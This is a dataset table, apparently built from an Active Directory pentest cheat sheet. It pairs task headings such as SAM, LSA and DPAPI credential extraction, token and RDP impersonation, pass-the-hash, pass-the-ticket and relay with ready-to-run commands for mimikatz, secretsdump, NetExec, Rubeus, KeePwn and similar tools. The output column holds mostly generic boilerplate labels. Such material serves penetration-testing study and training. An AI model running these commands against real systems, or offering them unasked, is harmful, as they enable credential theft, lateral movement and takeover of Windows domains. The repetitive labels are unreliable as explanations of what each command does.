instruction
stringclasses
270 values
input
stringlengths
3
214
output
stringclasses
297 values
Extract credentials from SAM
nxc smb <ip_range> -u <user> -p <password> --sam
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Extract credentials from SAM
msf> hashdump
Tool or command referenced under 'Extract credentials from SAM'.
Extract credentials from SAM
mimikatz "privilege::debug" "lsadump::sam" "exit"
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Extract credentials from SAM
secretsdump.py <domain>/<user>:<password>@<ip>
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Extract credentials from SAM
reg save HKLM\SAM <file>; reg save HKLM\SYSTEM <file>
Note or procedural step under 'Extract credentials from SAM'.
Extract credentials from SAM
secretsdump.py -system SYSTEM -sam SAM LOCAL
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Extract credentials from SAM
reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb_ip>\share'
Note or procedural step under 'Extract credentials from SAM'.
Extract credentials from SAM
secretsdump.py -system SYSTEM -sam SAM LOCAL
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Extract credentials from SAM
regsecrets.py <domain>/<user>:<password>@<ip>
Note or procedural step under 'Extract credentials from SAM'.
Extract credentials from LSA
nxc smb <ip_range> -u <user> -p <password> --lsa
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Extract credentials from LSA
mimikatz "privilege::debug" "lsadump::lsa" "exit"
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Extract credentials from LSA
reg save HKLM\SECURITY <file>; reg save HKLM\SYSTEM <file>
Note or procedural step under 'Extract credentials from LSA'.
Extract credentials from LSA
secretsdump.py -system SYSTEM -security SECURITY
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Extract credentials from LSA
reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb_ip>\share'
Note or procedural step under 'Extract credentials from LSA'.
Extract credentials from DPAPI
DPAPI
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
nxc smb <ip_range> -u <user> -p <password> --dpapi [cookies] [nosystem]
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Extract credentials from DPAPI
donpapi <domain>/<user>:<password>@<target>
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
dpapidump.py <domain>/<user>:<password>@<target>
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
get masterkey
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
mimikatz "sekurlsa::dpapi"
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Extract credentials from DPAPI
dploot.py browser -d <domain> -u <user> -p '<password>' <ip> -mkfile <masterkeys_file>
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
lsassy -d <domain> -u <user> -p <password> <ip> -m rdrleakdiag -M masterkeys
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
dploot.py browser -d <domain> -u <user> -p '<password>' <ip> -mkfile <masterkeys_file>
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
SharpDPAPI.exe triage
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
Crack users masterkey
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
copy c:\users\<user>\AppData\Roaming\Microsoft\Protect\<SID>
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
DPAPImk2john.py --preferred <prefered_file>
Tool or command referenced under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
DPAPImk2john.py -c domain -mk <masterkey> -S <sid> #DPAPImk
Tool or command referenced under 'Extract credentials from DPAPI'.
Impersonate
Impersonate
Note or procedural step under 'Impersonate'.
Impersonate
msf> use incognito impersonate_token <domain>\\<user>
Tool or command referenced under 'Impersonate'.
Impersonate
nxc smb <ip> -u <localAdmin> -p <password> --loggedon-users
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Impersonate
nxc smb <ip> -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Impersonate
irs.exe list
Note or procedural step under 'Impersonate'.
Impersonate
irs.exe exec -p <pid> -c <command>
Note or procedural step under 'Impersonate'.
Impersonate
Impersonate with adcs
Note or procedural step under 'Impersonate'.
Impersonate
masky - d <domain> -u <user> (-p <password> || -k || -H <hash>) -ca <certificate authority> <ip>
Note or procedural step under 'Impersonate'.
Impersonate
Impersonate RDP Session
Note or procedural step under 'Impersonate'.
Impersonate
psexec.exe -s -i cmd
Note or procedural step under 'Impersonate'.
Impersonate
query user
Note or procedural step under 'Impersonate'.
Impersonate
tscon.exe <id> /dest:<session_name> #RDP
Note or procedural step under 'Impersonate'.
Misc
Find Users
Note or procedural step under 'Misc'.
Misc
smbmap.py --host-file ./computers.list -u <user> -p <password> -d <domain> -r 'C$\Users' --dir-only --no-write-check --no-update --no-color --csv users_directory.csv
Note or procedural step under 'Misc'.
Misc
Extract Keepass
Note or procedural step under 'Misc'.
Misc
KeePwn.py plugin add -u '<user>' -p '<password>' -d '<domain>' -t <target> --plugin KeeFarceRebornPlugin.dll
Note or procedural step under 'Misc'.
Misc
KeePwn.py trigger add -u '<user>' -p '<password>' -d '<domain>' -t <target>
Note or procedural step under 'Misc'.
Misc
Hybrid (Azure AD-Connect)
Note or procedural step under 'Misc'.
Misc
Dump cleartext password of MSOL Account on ADConnect Server
Note or procedural step under 'Misc'.
Misc
azuread_decrypt_msol_v2.ps1 #DCSYNC
Note or procedural step under 'Misc'.
Misc
nxc smb <ip> -u <user> -p <password> -M msol #DCSYNC
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Clear text Password
Interactive-shell - psexec
Note or procedural step under 'Clear text Password'.
Clear text Password
psexec.py <domain>/<user>:<password>@<ip>
Note or procedural step under 'Clear text Password'.
Clear text Password
psexec.exe -AcceptEULA \\<ip>
Note or procedural step under 'Clear text Password'.
Clear text Password
psexecsvc.py <domain>/<user>:<password>@<ip>
Note or procedural step under 'Clear text Password'.
Clear text Password
Pseudo-shell (file write and read)
Note or procedural step under 'Clear text Password'.
Clear text Password
atexec.py <domain>/<user>:<password>@<ip> "command"
Note or procedural step under 'Clear text Password'.
Clear text Password
smbexec.py <domain>/<user>:<password>@<ip>
Note or procedural step under 'Clear text Password'.
Clear text Password
wmiexec.py <domain>/<user>:<password>@<ip>
Note or procedural step under 'Clear text Password'.
Clear text Password
dcomexec.py <domain>/<user>:<password>@<ip>
Note or procedural step under 'Clear text Password'.
Clear text Password
nxc smb <ip_range> -u <user> -p <password> -d <domain> -x <cmd>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Clear text Password
WinRM
Note or procedural step under 'Clear text Password'.
Clear text Password
evil-winrm -i <ip> -u <user> -p <password>
Note or procedural step under 'Clear text Password'.
Clear text Password
Enter-PSSession -ComputerName <computer> -Credential <domain>\<user>
Note or procedural step under 'Clear text Password'.
Clear text Password
nxc winrm <ip_range> -u <user> -p <password> -d <domain> -x <cmd>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Clear text Password
RDP
Note or procedural step under 'Clear text Password'.
Clear text Password
xfreerdp /u:<user> /d:<domain> /p:<password> /v:<ip>
Note or procedural step under 'Clear text Password'.
Clear text Password
SMB
Note or procedural step under 'Clear text Password'.
Clear text Password
smbclient.py <domain>/<user>:<password>@<ip>
SMB client usage to list or access network shares.
Clear text Password
smbclient-ng.py -d <domain> -u <user> -p <password> --host <ip>
SMB client usage to list or access network shares.
Clear text Password
MSSQL
Note or procedural step under 'Clear text Password'.
Clear text Password
nxc mssql <ip_range> -u <user> -p <password>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Clear text Password
mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>
Note or procedural step under 'Clear text Password'.
NT Hash
Pass the Hash
Note or procedural step under 'NT Hash'.
NT Hash
mimikatz "privilege::debug sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>"
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
NT Hash
RDP
Note or procedural step under 'NT Hash'.
NT Hash
reg.py <domain>/<user>@<ip> -hashes ':<hash>' add -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v 'DisableRestrictedAdmin' -vt 'REG_DWORD' -vd '0'
Note or procedural step under 'NT Hash'.
NT Hash
WinRM
Note or procedural step under 'NT Hash'.
NT Hash
evil-winrm -i <ip> -u <user> -H <hash>
Note or procedural step under 'NT Hash'.
NT Hash
Overpass the Hash / Pass the key (PTK)
Note or procedural step under 'NT Hash'.
NT Hash
Rubeus.exe asktgt /user:victim /rc4:<rc4value>
Tool or command referenced under 'NT Hash'.
NT Hash
Rubeus.exe ptt /ticket:<ticket>
Tool or command referenced under 'NT Hash'.
NT Hash
Rubeus.exe createnetonly /program:C:\Windows\System32\[cmd.exe||upnpcont.exe]
Tool or command referenced under 'NT Hash'.
NT Hash
getTGT.py <domain>/<user> -hashes :<hashes>
Note or procedural step under 'NT Hash'.
NT Hash
getTGT.py <domain>/<user> -hashes :<hashes>
Note or procedural step under 'NT Hash'.
Kerberos
Pass the Ticket (ccache / kirbi)
Note or procedural step under 'Kerberos'.
Kerberos
Convert Format
Note or procedural step under 'Kerberos'.
Kerberos
ticketConverter.py <kirbi||ccache> <ccache||kirbi>
Note or procedural step under 'Kerberos'.
Kerberos
export KRB5CCNAME=/root/impacket-examples/domain_ticket.ccache
Note or procedural step under 'Kerberos'.
Kerberos
impacket tools: Same as Pass the hash but use : -k and -no-pass for impacket
Note or procedural step under 'Kerberos'.
Kerberos
mimikatz kerberos::ptc "<ticket>"
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Kerberos
Rubeus.exe ptt /ticket:<ticket>
Tool or command referenced under 'Kerberos'.
Kerberos
proxychains secretsdump.py -k'<domain>'/'<user>'@'<ip>'
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Kerberos
Modify SPN
Note or procedural step under 'Kerberos'.
Kerberos
tgssub.py -in <ticket.ccache> -out <newticket.ccache> -altservice "<service>/<target>" #pr 1256
Note or procedural step under 'Kerberos'.
Kerberos
Aeskey
Note or procedural step under 'Kerberos'.
Kerberos
impacket tools: Same as Pass the hash but use : -aesKey for impacket (and use FQDN)
Note or procedural step under 'Kerberos'.
Kerberos
proxychains secretsdump.py -aesKey <key> '<domain>'/'<user>'@'<ip>'
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Socks (relay)
proxychains lookupsid.py <domain>/<user>@<ip> -no-pass -domain-sids
Note or procedural step under 'Socks (relay)'.
Socks (relay)
proxychains mssqlclient.py -windows-auth <domain>/<user>@<ip> -no-pass
Note or procedural step under 'Socks (relay)'.
Socks (relay)
proxychains secretsdump.py -no-pass '<domain>'/'<user>'@'<ip>'
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Socks (relay)
proxychains smbclient.py -no-pass <user>@<ip>
SMB client usage to list or access network shares.